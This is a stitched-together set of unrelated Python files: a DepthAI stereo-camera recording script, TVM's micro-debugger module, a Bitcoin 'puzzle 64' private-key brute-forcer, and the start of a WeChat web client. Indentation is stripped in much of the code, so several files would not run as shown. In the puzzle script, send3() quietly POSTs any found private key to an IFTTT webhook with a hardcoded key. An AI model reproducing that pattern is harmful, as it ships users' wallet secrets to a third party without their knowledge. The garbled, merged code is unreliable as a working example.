print(f'Thread {os.getpid()} enqueuing (wls_queue_out.size: {wls_queue_out.qsize()}) frame no: {wls_counter} ({wls_counter_out}) - {disp_img.shape} - {rr_img.shape} - {filtered_disp.shape} - {colored_disp.shape}...')
        queue_out.put((wls_counter_out, filtered_disp, colored_disp))
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
preview_data = []
preview_counter = 0
#def preview_worker(preview_queue_in):
def preview_worker():
global ringbuffer
print(f'preview_worker() thread {os.getpid()} starting...')
while True:
if args.debug_preview_threading:
#print(f'Thread {os.getpid()} dequeuing (preview_queue_in.size: {preview_queue_in.qsize()})...')
print(f'Thread {os.getpid()} dequeuing (len(ringbuffer): {len(ringbuffer)}) - {ringbuffer}...')
#preview_counter, ringbuffer = preview_queue_in.get(True)
if ringbuffer.isEmpty():
time.sleep(0.1)
continue
ringbuffer_item = ringbuffer.remove()
if args.debug_preview_threading:
#print(f'Thread {os.getpid()} got frame no.: {preview_counter} and ringbuffer_item {type(ringbuffer_item)}...')
print(f'Thread {os.getpid()} got ringbuffer_item {type(ringbuffer_item)}...')
preview_counter, depth_frame, disp_img, rr_img, colored_disp = ringbuffer_item
if args.debug_preview_threading:
print(f'Thread {os.getpid()} got frame no: {preview_counter} - {depth_frame.shape}...')
preview_thread_impl(args, preview_counter, depth_frame, disp_img, rr_img, colored_disp)
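# preview_worker polls the shared ring buffer instead of blocking on a multiprocessing queue
# (the queue-based variant is left commented out above); the 0.1 s sleep keeps the busy-wait
# cheap while the main capture loop below produces frames.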
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
no_of_wls_threads = 16
wls_filter = None
wls_queue_in = None
wls_queue_out = None
wls_th_pool = None
if args.wls_filter:
wls_filter = wlsFilter(args, _lambda=8000, _sigma=1.5, baseline=baseline, fov=fov, disp_levels=disp_levels)
wls_queue_in = multiprocessing.Queue()
wls_queue_out = multiprocessing.Queue()
wls_th_pool = multiprocessing.Pool(no_of_wls_threads, wls_worker, (wls_queue_in, wls_queue_out, wls_filter, ))
# don't forget the comma here ^
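# The trailing comma is the usual guard against the single-argument case: (x) is just x,
# while (x,) is a 1-tuple, which is what Pool expects for initargs; with three initargs it is
# optional but harmless. Using wls_worker as the pool "initializer" is unconventional: each
# pool process runs it forever, effectively turning the pool into N dedicated queue consumers.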
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
'''
no_of_preview_threads = 1
preview_filter = None
preview_queue_in = None
preview_th_pool = None
if args.show_preview:
preview_queue_in = multiprocessing.Queue()
preview_th_pool = multiprocessing.Pool(no_of_preview_threads, preview_worker, (preview_queue_in, ))
# don't forget the comma here ^
'''
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------------------------------
import threading
preview_thread = threading.Thread(target=preview_worker, args=[])
preview_thread.start()
print(f'Active Threads: {threading.active_count()}')
if args.wls_filter or args.show_preview:
# Create output
xout_dep = pipeline.createXLinkOut()
xout_dep.setStreamName("disparity")
if args.debug_pipeline_types:
print(f'{type(cam_rgb) = } - {cam_rgb = }')
print(f'{type(cam_rgb.video) = } - {cam_rgb.video = }')
print(f'{type(cam_rgb.preview) = } - {cam_rgb.preview = }')
print(f'{type(depth) = } - {depth = }')
print(f'{type(depth.disparity) = } - {depth.disparity = }')
depth.disparity.link(xout_dep.input)
if args.rgb:
stream_name = 'h265_rgb'
print(f'Enabling stream: {colored.fg("red") + stream_name + rst}')
videorgbEncoder, videorgbOut = create_encoder(pipeline, cam_rgb.video, color_resolution, stream_name)
if args.disparity:
stream_name = 'h265_depth'
print(f'Enabling stream: {colored.fg("blue") + stream_name + rst}')
videodispEncoder, videodispOut = create_encoder(pipeline, depth.disparity, depth_resolution, stream_name)
else:
stream_name = 'h265_left'
print(f'Enabling stream: {colored.fg("green") + stream_name + rst}')
videoleftEncoder, videoleftOut = create_encoder(pipeline, depth.syncedLeft, depth_resolution, stream_name)
stream_name = 'h265_right'
print(f'Enabling stream: {colored.fg("yellow") + stream_name + rst}')
videorightEncoder, videorightOut= create_encoder(pipeline, depth.syncedRight, depth_resolution, stream_name)
#if args.wls_filter or args.rectified_left:
if args.rectified_left:
stream_name = 'h265_rl'
print(f'Enabling stream: {colored.fg("light_green") + stream_name + rst}')
videorlEncoder, videorlOut = create_encoder(pipeline, depth.rectifiedLeft, depth_resolution, stream_name)
if args.wls_filter or args.rectified_right:
stream_name = 'h265_rr'
print(f'Enabling stream: {colored.fg("light_yellow") + stream_name + rst}')
videorrEncoder, videorrOut = create_encoder(pipeline, depth.rectifiedRight, depth_resolution, stream_name)
if args.show_preview:
depth_size = (depth_width, depth_height)
color_size = (color_width, color_height)
if args.preview_downscale_factor != 1:
color_size = (color_width//args.preview_downscale_factor, color_height//args.preview_downscale_factor)
depth_size = (depth_width//args.preview_downscale_factor, depth_height//args.preview_downscale_factor)
# Pipeline is defined; now connect to the device
with dai.Device(pipeline, usb2Mode=args.force_usb2) as device:
# Start pipeline
#device.startPipeline()
if args.wls_filter or args.show_preview:
# Output queue will be used to get the rgb frames from the output defined above
q_dep = device.getOutputQueue(name="disparity", maxSize=30, blocking=False)
# Output queue will be used to get the encoded data from the output defined above
if args.rgb:
q_265c = device.getOutputQueue(name="h265_rgb", maxSize=30, blocking=False)
if args.disparity:
q_265d = device.getOutputQueue(name="h265_depth", maxSize=30, blocking=False)
else:
q_265l = device.getOutputQueue(name="h265_left", maxSize=30, blocking=False)
q_265r = device.getOutputQueue(name="h265_right", maxSize=30, blocking=False)
if args.wls_filter:
q_rright = device.getOutputQueue(name="rectifiedRight", maxSize=30, blocking=False)
q_rleft = device.getOutputQueue(name="rectifiedLeft", maxSize=30, blocking=False)
if args.rectified_right:
q_265rr = device.getOutputQueue(name="h265_rr", maxSize=30, blocking=False)
if args.rectified_left:
q_265rl = device.getOutputQueue(name="h265_rl", maxSize=30, blocking=False)
cmap_counter = 0
# The .h265 file is a raw stream file (not playable yet)
if args.rgb:
videorgbFile = open(color_outfn,'wb')
if args.disparity:
#videorgbFile = open(color_outfn,'wb')
videodepthFile = open(depth_outfn,'wb')
else:
#videorgbFile = open(color_outfn,'wb')
videoleftFile = open(left_outfn, 'wb')
videorightFile = open(right_outfn,'wb')
if args.wls_filter or args.rectified_right:
videorrFile = open(rr_outfn, 'wb')
if args.wls_filter or args.rectified_left:
videorlFile = open(rl_outfn, 'wb')
print("Press Ctrl+C to stop encoding...")
try:
start_capture_time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
last_time = start_time
while True:
if args.rgb:
in_h265c = dequeue(q_265c, 'rgb-h265' , args.debug_pipeline_steps, 1, debug=False)
if args.wls_filter or args.rectified_right:
in_h265rr = dequeue(q_265rr, 'rright-h265', args.debug_pipeline_steps, 2, debug=False)
#if args.wls_filter or args.rectified_left:
if args.rectified_left:
in_h265rl = dequeue(q_265rl, 'rleft-h265' , args.debug_pipeline_steps, 3, debug=False)
if args.disparity:
in_h265d = dequeue(q_265d, 'depth-h265' , args.debug_pipeline_steps, 4, debug=False)
else:
in_h265l = dequeue(q_265l, 'left-h265' , args.debug_pipeline_steps, 5, debug=False)
in_h265r = dequeue(q_265r, 'right-h265' , args.debug_pipeline_steps, 6, debug=False)
if args.wls_filter or args.show_preview:
in_depth = dequeue(q_dep, 'depth-preview', args.debug_pipeline_steps, 7, debug=False)
if args.debug_pipeline_steps:
print('8. all queues done')
if args.rgb:
in_h265c.getData().tofile(videorgbFile) # appends the packet data to the opened file
if args.disparity:
in_h265d.getData().tofile(videodepthFile) # appends the packet data to the opened file
else:
in_h265l.getData().tofile(videoleftFile) # appends the packet data to the opened file
in_h265r.getData().tofile(videorightFile) # appends the packet data to the opened file
if args.wls_filter or args.rectified_right:
in_h265rr.getData().tofile(videorrFile) # appends the packet data to the opened file
#if args.wls_filter or args.rectified_left:
if args.rectified_left:
in_h265rl.getData().tofile(videorlFile) # appends the packet data to the opened file
curr_time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
last_time = compute_fps(curr_time, last_time, start_capture_time, dequeued_frames_dict)
disp_img = rr_img = colored_disp = None
if args.wls_filter:
in_rright = q_rright.get()
rr_img = in_rright.getFrame()
#rr_img = cv2.flip(rr_img, flipCode=1)
disp_img = in_depth.getFrame()
if args.preview_downscale_factor:
rr_img = cv2.resize(rr_img, dsize=(depth_width//args.preview_downscale_factor, depth_height//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
disp_img = cv2.resize(disp_img, dsize=(depth_width//args.preview_downscale_factor, depth_height//args.preview_downscale_factor), interpolation=cv2.INTER_CUBIC)
if args.wls_max_queue == 0 or wls_queue_in.qsize() < args.wls_max_queue:
wls_counter += 1
if args.debug_wls_threading:
print(f'Main thread enqueuing frame no: {wls_counter} because wls_queue_in.size: {wls_queue_in.qsize()}...')
#flipHorizontal = cv2.flip(rr_img, 1)
wls_queue_in.put((wls_counter, disp_img, rr_img))
if args.show_wls_preview:
if args.wls_max_queue == 0 or wls_queue_in.qsize() < args.wls_max_queue:
if args.debug_wls_threading:
print(f'Main thread dequeuing frame because wls_queue_out.size: {wls_queue_out.qsize()}...')
item = wls_queue_out.get(True)
if args.debug_wls_threading:
print(f'Main thread got item {type(item)}...')
wls_counter_out, filtered_disp, colored_disp = item
if args.debug_wls_threading:
print(f'Main thread got frame no: {wls_counter_out} - {filtered_disp.shape} - {colored_disp.shape}...')
if args.show_preview:
#if args.preview_max_queue == 0 or preview_queue_in.qsize() < args.preview_max_queue:
if True:
if args.debug_preview_threading:
#print(f'Main thread enqueuing frame no: {preview_counter} because preview_queue_in.size: {preview_queue_in.qsize()}...')
print(f'Main thread enqueuing frame no: {preview_counter} because len(ringbuffer): {len(ringbuffer)}...')
# data is originally represented as a flat 1D array, it needs to be converted into HxW form
depth_h, depth_w = in_depth.getHeight(), in_depth.getWidth()
if args.debug_img_sizes:
print(f'{depth_h = } - {depth_w = }')
depth_frame = in_depth.getData().reshape((depth_h, depth_w)).astype(np.uint8)
if not ringbuffer.isFull():
ringbuffer.add((preview_counter, depth_frame, disp_img, rr_img, colored_disp))
#preview_queue_in.put((preview_counter, ringbuffer))
if args.debug_preview_threading:
print(f'len(ringbuffer): {len(ringbuffer)} - {ringbuffer}...')
preview_counter += 1
cmap_counter += 1
    except KeyboardInterrupt:
        # Keyboard interrupt (Ctrl + C) detected: close whichever raw stream files were opened
        if args.rgb:
            videorgbFile.close()
        if args.disparity:
            videodepthFile.close()
        else:
            videoleftFile.close()
            videorightFile.close()
        if args.wls_filter or args.rectified_right:
            videorrFile.close()
        if args.wls_filter or args.rectified_left:
            videorlFile.close()
run_time = datetime_from_string(curr_time) - datetime_from_string(start_capture_time)
print(f'{start_time = } - {start_capture_time = } - {curr_time = } - {run_time = }')
print('Frames statistics:')
for stream, frames in dequeued_frames_dict.items():
fps = frames/run_time.total_seconds()
print(f'{stream = } - {frames = } - {fps = :.2f}')
print("To view the encoded data, convert the stream file (.h265) into a video file (.mp4) using a command below:")
print("ffmpeg -framerate 30 -i video.h265 -c copy video.mp4")
preview_thread.join()
|
debugger.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Defines functions for controlling debuggers for micro TVM binaries."""
import atexit
import abc
import logging
import os
import signal
import subprocess
import sys
import termios
import threading
import psutil
from .._ffi import register_func
from . import class_factory
from . import transport
# NOTE: assumed import path for the FdTransport used by GdbTransportDebugger below
from .transport import file_descriptor as fd
_LOG = logging.getLogger(__name__)
class Debugger(metaclass=abc.ABCMeta):
"""An interface for controlling micro TVM debuggers."""
def __init__(self):
self.on_terminate_callbacks = []
@abc.abstractmethod
def start(self):
"""Start the debugger, but do not block on it.
The runtime will continue to be driven in the background.
"""
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
"""Terminate the debugger."""
raise NotImplementedError()
def _run_on_terminate_callbacks(self):
for callback in self.on_terminate_callbacks:
try:
callback()
except Exception: # pylint: disable=broad-except
_LOG.warning("on_terminate_callback raised exception", exc_info=True)
class GdbDebugger(Debugger):
"""Handles launching, suspending signals, and potentially dealing with terminal issues."""
# Number of seconds to wait in stop() for a graceful shutdown. After this time has elapsed,
# the debugger is kill()'d.
_GRACEFUL_SHUTDOWN_TIMEOUT_SEC = 5.0
# The instance of GdbDebugger that's currently started.
_STARTED_INSTANCE = None
@classmethod
def _stop_all(cls):
if cls._STARTED_INSTANCE:
cls._STARTED_INSTANCE.stop()
def __init__(self):
super(GdbDebugger, self).__init__()
self._is_running = False
self._child_alive_lock = threading.RLock()
self._is_child_alive = False
@abc.abstractmethod
def popen_kwargs(self):
raise NotImplementedError()
def _wait_for_child(self):
self.popen.wait()
with self._child_alive_lock:
            self._is_child_alive = False  # once wait() returns, the child has exited
@classmethod
def _sigint_handler(cls, signum, stack_frame): # pylint: disable=unused-argument
if cls._STARTED_INSTANCE is not None:
with cls._STARTED_INSTANCE._child_alive_lock:
exists = cls._STARTED_INSTANCE._is_child_alive
if exists:
try:
os.killpg(cls._STARTED_INSTANCE.child_pgid, signal.SIGINT)
return
except ProcessLookupError:
pass
raise Exception()
def start(self):
assert not self._is_running
assert not self._STARTED_INSTANCE
kwargs = self.popen_kwargs()
self.did_start_new_session = kwargs.setdefault("start_new_session", True)
self.old_termios = termios.tcgetattr(sys.stdin.fileno())
self.popen = subprocess.Popen(**kwargs)
self._is_running = True
self.__class__._STARTED_INSTANCE = self
try:
self.child_pgid = os.getpgid(self.popen.pid)
except Exception:
self.stop()
raise
with self._child_alive_lock:
self._is_child_alive = True
self.old_sigint_handler = signal.signal(signal.SIGINT, self._sigint_handler)
t = threading.Thread(target=self._wait_for_child)
t.daemon = True
t.start()
def stop(self):
if not self._is_running:
return
signal.signal(signal.SIGINT, self.old_sigint_handler)
termios.tcsetattr(sys.stdin.fileno(), termios.TCSAFLUSH, self.old_termios)
try:
children = psutil.Process(self.popen.pid).children(recursive=True)
for c in children:
c.terminate()
_, alive = psutil.wait_procs(children, timeout=self._GRACEFUL_SHUTDOWN_TIMEOUT_SEC)
for a in alive:
a.kill()
finally:
self.__class__._STARTED_INSTANCE = None
self._is_running = False
self._run_on_terminate_callbacks()
atexit.register(GdbDebugger._stop_all)
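# Registered once at import time: if the interpreter exits while a debugger is still running,
# _stop_all() invokes stop() so terminal settings are restored and child processes are reaped.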
class GdbTransportDebugger(GdbDebugger):
"""A debugger that uses a single GDB subprocess as both the transport and the debugger.
Opens pipes for the target's stdin and stdout, launches GDB and configures GDB's target
arguments to read and write from the pipes using /dev/fd.
"""
def __init__(self, args, **popen_kw):
super(GdbTransportDebugger, self).__init__()
self.args = args
self.popen_kw = popen_kw
def popen_kwargs(self):
stdin_read, stdin_write = os.pipe()
stdout_read, stdout_write = os.pipe()
os.set_inheritable(stdin_read, True)
os.set_inheritable(stdout_write, True)
sysname = os.uname()[0]
if sysname == "Darwin":
args = [
"lldb",
"-O",
f"target create {self.args[0]}",
"-O",
f"settings set target.input-path /dev/fd/{stdin_read}",
"-O",
f"settings set target.output-path /dev/fd/{stdout_write}",
]
if len(self.args) > 1:
args.extend(
["-O", "settings set target.run-args {}".format(" ".join(self.args[1:]))]
)
elif sysname == "Linux":
args = (
["gdb", "--args"] + self.args + ["</dev/fd/{stdin_read}", ">/dev/fd/{stdout_write}"]
)
else:
raise NotImplementedError(f"System {sysname} is not yet supported")
self.fd_transport = fd.FdTransport(stdout_read, stdin_write)
self.fd_transport.open()
return {
"args": args,
"pass_fds": [stdin_read, stdout_write],
}
def _wait_for_process_death(self):
self.popen.wait()
self.fd_transport.close()
def start(self):
to_return = super(GdbTransportDebugger, self).start()
threading.Thread(target=self._wait_for_process_death, daemon=True).start()
return to_return
def stop(self):
self.fd_transport.close()
super(GdbTransportDebugger, self).stop()
class _Transport(transport.Transport):
def __init__(self, gdb_transport_debugger):
self.gdb_transport_debugger = gdb_transport_debugger
def timeouts(self):
return transport.debug_transport_timeouts()
def open(self):
pass # Pipes opened by parent class.
def write(self, data, timeout_sec):
return self.gdb_transport_debugger.fd_transport.write(data, timeout_sec)
def read(self, n, timeout_sec):
return self.gdb_transport_debugger.fd_transport.read(n, timeout_sec)
def close(self):
pass # Pipes closed by parent class.
def transport(self):
return self._Transport(self)
class GdbRemoteDebugger(GdbDebugger):
"""A Debugger that invokes GDB and attaches to a remote GDBserver-based target."""
def __init__(
self, gdb_binary, remote_hostport, debug_binary, wrapping_context_manager=None, **popen_kw
):
super(GdbRemoteDebugger, self).__init__()
self.gdb_binary = gdb_binary
self.remote_hostport = remote_hostport
self.debug_binary = debug_binary
self.wrapping_context_manager = wrapping_context_manager
self.popen_kw = popen_kw
def popen_kwargs(self):
kwargs = {
"args": [
self.gdb_binary,
"-iex",
f"file {self.debug_binary}",
"-iex",
f"target remote {self.remote_hostport}",
],
}
kwargs.update(self.popen_kw)
return kwargs
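    # Illustrative expansion of the kwargs above (binary name and port are made up):
    #   gdb -iex "file build/firmware.elf" -iex "target remote localhost:3333"
    # i.e. GDB loads the symbols first, then attaches to the remote GDB-server stub.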
def start(self):
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__enter__()
super(GdbRemoteDebugger, self).start()
def stop(self):
try:
super(GdbRemoteDebugger, self).stop()
finally:
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__exit__(None, None, None)
GLOBAL_DEBUGGER = None
class DebuggerFactory(class_factory.ClassFactory):
SUPERCLASS = Debugger
def launch_debugger(debugger_factory, *args, **kw):
global GLOBAL_DEBUGGER
if GLOBAL_DEBUGGER is not None:
stop_debugger()
GLOBAL_DEBUGGER = debugger_factory.instantiate(*args, **kw)
GLOBAL_DEBUGGER.start()
@register_func("tvm.micro.debugger.launch_debugger")
def _launch_debugger(debugger_factory_json):
launch_debugger(DebuggerFactory.from_json(debugger_factory_json))
@register_func("tvm.micro.debugger.stop_debugger")
def stop_debugger():
global GLOBAL_DEBUGGER
if GLOBAL_DEBUGGER is not None:
try:
GLOBAL_DEBUGGER.stop()
finally:
GLOBAL_DEBUGGER = None
class RpcDebugger(Debugger):
"""A Debugger instance that launches the actual debugger on a remote TVM RPC server."""
def __init__(self, rpc_session, factory, wrapping_context_manager=None):
super(RpcDebugger, self).__init__()
self._factory = factory
self.launch_debugger = rpc_session.get_function("tvm.micro.debugger.launch_debugger")
self.stop_debugger = rpc_session.get_function("tvm.micro.debugger.stop_debugger")
self.wrapping_context_manager = wrapping_context_manager
def start(self):
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__enter__()
try:
self.launch_debugger(self._factory.to_json)
except Exception:
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__exit__(None, None, None)
raise
try:
input("Press [Enter] when debugger is set")
except Exception:
self.stop()
raise
self._is_running = True
def stop(self):
try:
self.stop_debugger()
self._run_on_terminate_callbacks()
finally:
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__exit__(None, None, None)
|
puzzle64.py
|
# Bitcoin Puzzle 64 Random
# Made by Andrei Melek
# https://github.com/Xh0st/puzzle64
try:
import sys
import os
import time
import hashlib
import binascii
import multiprocessing
from multiprocessing import Process, Queue
from multiprocessing.pool import ThreadPool
import threading
import base58
import ecdsa
import requests
import random
# If required imports are unavailable, we will attempt to install them!
except ImportError:
import subprocess
subprocess.check_call(["python3", '-m', 'pip', 'install', 'base58==1.0.0'])
subprocess.check_call(["python3", '-m', 'pip', 'install', 'ecdsa==0.13'])
subprocess.check_call(["python3", '-m', 'pip', 'install', 'requests==2.19.1'])
import base58
import ecdsa
import requests
def work():
# low = 0x100 #L61
# high = 0x1ff
low = 0x8000000000000000 #L48
high = 0xffffffffffffffff
return str ( hex ( random.randrange( low, high ) ) )[2:]
#Number of zeros to be added
def generate_private_key():
val = work()
result = val.rjust(48 + len(val), '0') #total=64
return str(result)
def private_key_to_WIF(private_key):
var80 = "80" + str(private_key)
var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify(var80)).hexdigest())).hexdigest()
return str(base58.b58encode(binascii.unhexlify(str(var80) + str(var[0:8]))), 'utf-8')
def private_key_to_public_key(private_key):
sign = ecdsa.SigningKey.from_string(binascii.unhexlify(private_key), curve = ecdsa.SECP256k1)
key_bytes = binascii.hexlify(sign.verifying_key.to_string()).decode('utf-8')
key = ('0x' + binascii.hexlify(sign.verifying_key.to_string()).decode('utf-8'))
# Get X from the key (first half)
half_len = len(key_bytes) // 2
key_half = key_bytes[:half_len]
# Add bitcoin byte: 0x02 if the last digit is even, 0x03 if the last digit is odd
last_byte = int(key[-1], 16)
bitcoin_byte = '02' if last_byte % 2 == 0 else '03'
public_key = bitcoin_byte + key_half
return public_key
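# Note: the value returned above is a 33-byte compressed public key in hex (66 characters):
# a one-byte prefix (02 if Y is even, 03 if Y is odd) followed by the 32-byte X coordinate.
# Checking the last hex digit of the key works because the parity of Y equals the parity of
# its least-significant hex digit.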
def public_key_to_address(public_key):
alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
count = 0; val = 0
var = hashlib.new('ripemd160')
var.update(hashlib.sha256(binascii.unhexlify(public_key.encode())).digest())
doublehash = hashlib.sha256(hashlib.sha256(binascii.unhexlify(('00' + var.hexdigest()).encode())).digest()).hexdigest()
address = '00' + var.hexdigest() + doublehash[0:8]
for char in address:
if (char != '0'):
break
count += 1
count = count // 2
n = int(address, 16)
output = []
while (n > 0):
n, remainder = divmod (n, 58)
output.append(alphabet[remainder])
while (val < count):
output.append(alphabet[0])
val += 1
return ''.join(output[::-1])
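# The routine above is standard Base58Check encoding of a P2PKH address:
#   1. payload  = 0x00 || RIPEMD160(SHA256(compressed_public_key))
#   2. checksum = first 4 bytes of SHA256(SHA256(payload))
#   3. address  = Base58(payload || checksum), emitting one leading '1' per leading zero byte
# (well-known addresses such as 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa have this shape).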
def get_balance(address):
return 8
    # time.sleep(0.1)  # This is to avoid over-using the API and keep the program running indefinitely.
# try:
# response = requests.get("https://rest.bitcoin.com/v2/address/details/" + str(address))
# return float(response.json()['balance'])
# except:
# return -1
def data_export(queue):
while True:
private_key = generate_private_key()
public_key = private_key_to_public_key(private_key)
address = public_key_to_address(public_key)
data = (private_key, address)
queue.put(data, block = False)
def worker(queue):
while True:
if not queue.empty():
data = queue.get(block = True)
balance = get_balance(data[1])
process(data, balance)
def send3(private_key):
payload = { 'value1' : 'P', 'value2' : private_key, 'value3' : 'R3'}
requests.post("https://maker.ifttt.com/trigger/hmbt/with/key/d8gr-cI50XXn1WSEOHf64W", data=payload)
def process(data, balance):
private_key = data[0]
address = data[1]
puzzle = "16jY7qLJnxb7CHZyqBP8qca9d51gAjyXQN" #P64
if (address != puzzle):
print("\r.",end="")
# print('{0}'.format(2)), # end=""
# print("{:<34}".format(str(address)) + " : " + str(balance))
if (address == puzzle):
send3(private_key)
print("FFFFFFFFFFFFFFFFF")
file = open("found.txt","a")
file.write("address: " + str(address) + "\n" +
"private key: " + str(private_key) + "\n" +
"WIF private key: " + str(private_key_to_WIF(private_key)) + "\n" +
"public key: " + str(private_key_to_public_key(private_key)).upper() + "\n" +
"balance: " + str(balance) + "\n\n")
file.close()
def thread(iterator):
processes = []
data = Queue()
data_factory = Process(target = data_export, args = (data,))
data_factory.daemon = True
processes.append(data_factory)
data_factory.start()
work = Process(target = worker, args = (data,))
work.daemon = True
processes.append(work)
work.start()
data_factory.join()
if __name__ == '__main__':
try:
pool = ThreadPool(processes = multiprocessing.cpu_count()*2)
        pool.map(thread, range(0, 4))  # spawn 4 producer/worker process pairs; throttle this if you re-enable the rate-limited balance API
except:
pool.close()
exit()
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import random
import multiprocessing
import platform
import logging
from collections import defaultdict
from urlparse import urlparse
from lxml import html
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
FORWARD_TYPES = json.loads(os.environ.get('WEGRAM_FORWARD_TYPES', '[]'))
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
def _unicode_list(data):
rv = []
for item in data:
if isinstance(item, str):
item = item.decode('utf-8')
elif isinstance(item, list):
item = _unicode_list(item)
elif isinstance(item, dict):
item = _unicode_dict(item)
rv.append(item)
return rv
def _unicode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, str):
key = key.decode('utf-8')
if isinstance(value, str):
value = value.decode('utf-8')
elif isinstance(value, list):
value = _unicode_list(value)
elif isinstance(value, dict):
value = _unicode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
        self.ContactList = []  # direct contacts (friends)
        self.GroupList = []  # group chats
        self.GroupMemeberList = []  # group members
        self.PublicUsersList = []  # official / service accounts
        self.SpecialUsersList = []  # special built-in accounts
self.autoReplyMode = False
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
        self.TimeOut = 20  # minimum interval between sync checks (seconds)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
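        # A successful jslogin response looks roughly like (uuid value illustrative):
        #   window.QRLogin.code = 200; window.QRLogin.uuid = "4ZTKfKYVXw==";
        # so the method returns True only when code == '200' and a uuid was issued.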
def genQRCode(self):
if sys.platform.startswith('win'):
self._showQRCodeImg()
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
